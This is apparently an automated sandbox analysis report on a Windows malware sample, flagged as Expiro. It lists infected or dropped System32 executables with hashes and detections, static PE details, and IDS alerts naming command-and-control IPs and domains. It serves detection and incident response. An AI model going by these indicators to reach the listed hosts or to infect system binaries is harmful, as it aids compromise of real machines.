Preview:	....Qj..B..W..~[..P......2T..c.l.a..(....<.C.2.t..d...Y....1...f...NM!C..C`.[..-kRZQr.P..H..=tK\|.n..a.wV...V.:3.....).S...\y'%.F.....<JXJp. ...O..4v.r.b...T.W.K.%'E!..$.j.N..f....qo.......W.......=....+..../.X6......9..S.....i6.Z..qO..ql.O....N..,K^....e.Hf... .....-!..J.}.`J.y._..c... .J=....{.[n....<.....V......HL........jYp.?....~l.+.............P.^@.L..h.lf.ju.V...}./..R.d..r.../.ya...^.\.....ID.r......>.2..w.Or.E.9).......%.r.....-.....\|.....V.gJ....u.-.W......l..d2N..........K....B.J..gZ.!..NX.3..+V...{..wC..6.....V......\....5.S2.....%.Tfq..@.d.X......O2....n...ZQ,.4..83..EP.q..$z.....uL..euh.p..`o...A..7-t\c9.zei.......q....%..q.....2U...H.Oy...]s..u...BJ..:p.-...u.Y.......\|..d$VQ..&T3.4..8\\|..tQ.W..\...2^./...>.;w...\..>.d89).:1.<.1Du1_g....61.......G...K.d....JLh.ZF.K=^...U7....c.....@Bk..=.. .P..j...q.N......6f..eNP.....@!.F..&.u.....t....8#c.G.U.v........G`9&..L...>....m...g...$....gn17,j.YE..*....L.S..q&..=.u..X.....

C:\Windows\System32\AppVClient.exe

Download File

Process:	C:\Users\user\Desktop\I3LPkQh2an.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1348608
Entropy (8bit):	7.251569733727864
Encrypted:	false
SSDEEP:	24576:lQW4qoNUgslKNX0Ip0MgHCpoMBOu3Vg9N9JMlDlfjRiVuVsWt5MJMs:lQW9BKNX0IPgiKMBOulgFIDRRAubt5M
MD5:	0FBD336D4561FB58CC24C965F9B57A79
SHA1:	097A5B2F858069F72CB44858F3DEE7224533F5F5
SHA-256:	9AE7D29186B8803CBE27D82B1AF7BF665C6C094A1F3AF3B6EA8429674CFAEA55
SHA-512:	62DF82F381F3F664CAF70085BD0B546280277393384D1B8E7741E35BF2C34B5797A72E35FFE30EF3ABEE8E41F1E1B195F50E0CD0E42EDB6CDEADFA0C5B900BDE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@....................................Z..... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

Download File

Process:	C:\Users\user\Desktop\I3LPkQh2an.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1592832
Entropy (8bit):	4.174831444481443
Encrypted:	false
SSDEEP:	24576:42G7AbHjk8Vg9N9JMlDlfjRiVuVsWt5MJMs:42G7AbHjrgFIDRRAubt5M
MD5:	8532FFD22B9001E55EEF1B70229CE7D5
SHA1:	2D6E8EBC51B55B0268C3C050362B7BD6AD64C581
SHA-256:	E6FB501C5D447719F0C7A96AA748434CA5D63EA77C67247BE2006D620344777B
SHA-512:	FBFC9FEBB955C3A4026A157B34E31B2FBBE442E54285A75997A13081DDD9DF644160A67E90129A3B6D26B5F8866AC438BED52A321288FC29D214A78BFAD9360F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.....................................`.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...............n..............@...........................................................................................................................................................................................................................................................

C:\Windows\System32\FXSSVC.exe

Download File

Process:	C:\Users\user\Desktop\I3LPkQh2an.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	1242624
Entropy (8bit):	7.287676431576278
Encrypted:	false
SSDEEP:	24576:hkdpSI+K3S/GWei+qNv2wG3EVg9N9JMlDlfjRiVuVsWt5MJMs:h6SIGGWei2wG3EgFIDRRAubt5M
MD5:	F5C3AF7F65A2D58E83F7ADEB452660F9
SHA1:	B67E24DF91E7DF23FE162AD763238C39676530F9
SHA-256:	9B1A9DBEED690507D9F4E4DABF66C3A1A3C981C65F49B09E3942963FFA6B9AB7
SHA-512:	A3C0D39AA7320852C6E89CDEB85DFAD24EF6E173AA8E091C0CDB00D10EAD8E53C2A266010690CD7BA4E0CCE4CDBA420B02FC3631CC8224E6E8922225799593DF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...\|..}x...y..}x..}y.x\|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P....... .... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

C:\Windows\System32\alg.exe

Download File

Process:	C:\Users\user\Desktop\I3LPkQh2an.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1594368
Entropy (8bit):	4.175684233123378
Encrypted:	false
SSDEEP:	12288:IEP3RFzV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:jF5Vg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	09DAC14A3F12ABA6BB239CCFA7799AD0
SHA1:	0B6E0DA2FBB7ED6065FD5FE324746C4E853FC522
SHA-256:	E89949F570D885BE36A88561BD57DF75BFB89EB869073101334C038B3BFE0764
SHA-512:	7B560B78FD23297D8CCA26A5FE6CD20A1B39B2183FDDDBEA2BA5D06BABA27FE7A30CAE9E85F3ABCB00CB21679F78767417CB9E6CED423BC19EBF469E0274F363
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................Gl.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................

C:\Windows\System32\config\systemprofile\AppData\Roaming\a8a24eee21ca4edc.bin

Download File

Process:	C:\Windows\System32\AppVClient.exe
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.984465246022505
Encrypted:	false
SSDEEP:	192:Rg7aDXLgyt+neIs+0Lscu2JfhUtAlr/ltlECxftvrtEoSvz+TltfF+z9QA9byQY+:OALgns+ORJfhUtAL48taoKKltfFmLAn+
MD5:	C53A2F2AE41A04DFAB7EEB1F9842A248
SHA1:	C28CFA0B83FDEE28FF4AA8550015515425292AC5
SHA-256:	6358E8A373D8774D613DB07222168AE1BE6676D7F010EB5F7CEB7E7230F8CD09
SHA-512:	1BFE089F049FABD8DED93A8515551565C47B79267FDB6F49AC8FFDE011872245C40D9A419C0EA03F5721A7C4A0124AF44558607A09F7D27A3B0542F3D83187C5
Malicious:	false
Preview:	3.f..;.R..4..).sL.....vIK...=V.R;9].....g.%.Mqc......4zX...~.....A..a;.~...y....."(.4..%.z..........+R...vQ...<UV.U..Dv..q..I.....w..DmE...^..b.....Q..t.e.....f.qw.#........:.\..0LW.S...J,...2...t.eu../fV/.M......3.0.......V.u?.EF....R...=...u.v...).."&.......tL...O.F...c..=...p.!o.E.../.K.P......]TUm..Hb6.xo..~..#.....UV...}........w....A.pG.......k...c.P....%,(.G...Y=0..$>n._...@l..=-.\\D......E.isDW..m...\1....1i.]......aO.]E...m2....@....df2...^.kI.b.OV..K2I.L.q...@#T..:..k..E....dXZ.F.E._.6..)..V..[.0..j.....69..f..L.k....}l.....g.....u..y...Z.I8^mna....C.a.k...y....ivA...A.<..4...W..S...!.u....L..A..9.:i).......gG?...eA.)..;..?....:].g...~.......)._z#Y.....@.O.'.t.qk&.1.U.p..0Q...f..~.OK.+F.....RH..k#T.L[.......m..7g8..9......c....$........]:......J.E.c...a....M.....;b.."S.%s.'..\...;.[D.A......$.......\o.......T.$....g+e'..}.\|...6N....0p.C...G}v..Z......S.a.X.Re..lk......Mo N9..x.{5.8.3GU8.#..se......1E.v..YN.+2<....2K.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.518241343556186
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	I3LPkQh2an.exe
File size:	1'793'024 bytes
MD5:	b277e18dd8f1c8cc1908e58b16db405c
SHA1:	b64ecf7d0cf0433d9c919acbf320b421de1a5cf3
SHA256:	f9d78174d15fee469beb09ad3a07fb4a87333cd00477b8dc934568edcb959738
SHA512:	545cc34ff5b14f996bc13a9a3f9a7e308cabc8919b604eac0ba290103ccac59cae54d0d2f9f8584091fc053777be9360e81927464cd8f881a2d5a16c435e94d6
SSDEEP:	49152:k20c++OCvkGs9FaH8AmZ7D3QkaUDmrbtTZY4gFIDRRAubt5M:/B3vkJ95AcD3QJ4mrbtVcUf
TLSH:	C585E02273DDC361CB679173FF2AB7016FBB38610630B95B2F940D79A950162162DBA3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x675A1BFA [Wed Dec 11 23:10:50 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F1840FF9DEAh
jmp 00007F1840FECBB4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F1840FECD3Ah
cmp edi, eax
jc 00007F1840FED09Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F1840FECD39h
rep movsb
jmp 00007F1840FED04Ch
cmp ecx, 00000080h
jc 00007F1840FECF04h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F1840FECD40h
bt dword ptr [004BE324h], 01h
jc 00007F1840FED210h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F1840FECEDDh
test edi, 00000003h
jne 00007F1840FECEEEh
test esi, 00000003h
jne 00007F1840FECECDh
bt edi, 02h
jnc 00007F1840FECD3Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F1840FECD43h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F1840FECD95h
bt esi, 03h
jnc 00007F1840FECDE8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x5f440	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	3090a3327bcf1f126c5c7f9e4891301c	False	0.5728679102422908	data	6.676131091367248	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x5f440	0x5f600	b1dc1d2831362683146d02bc6b86ba2d	False	0.9306320650393185	data	7.901484850401359	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x127000	0x96000	0x95000	e8fd5eaabcdff57d4ff458e7f7074b3d	False	0.975751428796141	data	7.938027429915368	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x56705	data			1.0003276345631869
RT_GROUP_ICON	0x125ec0	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x125f38	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x125f4c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x125f60	0x14	data	English	Great Britain	1.25
RT_VERSION	0x125f74	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x126050	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T21:24:19.651050+0100	2850851	ETPRO MALWARE Win32/Expiro.NDO CnC Activity	1	192.168.2.7	49750	54.244.188.177	80	TCP
2025-01-10T21:24:19.811403+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	54.244.188.177	80	192.168.2.7	49751	TCP
2025-01-10T21:24:19.811403+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	54.244.188.177	80	192.168.2.7	49751	TCP
2025-01-10T21:24:23.207715+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	44.221.84.105	80	192.168.2.7	49775	TCP
2025-01-10T21:24:23.207715+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	44.221.84.105	80	192.168.2.7	49775	TCP
2025-01-10T21:24:23.316285+0100	2051648	ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)	1	192.168.2.7	60958	1.1.1.1	53	UDP
2025-01-10T21:24:25.594354+0100	2051649	ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)	1	192.168.2.7	65251	1.1.1.1	53	UDP
2025-01-10T21:24:27.040825+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	18.141.10.107	80	192.168.2.7	49795	TCP
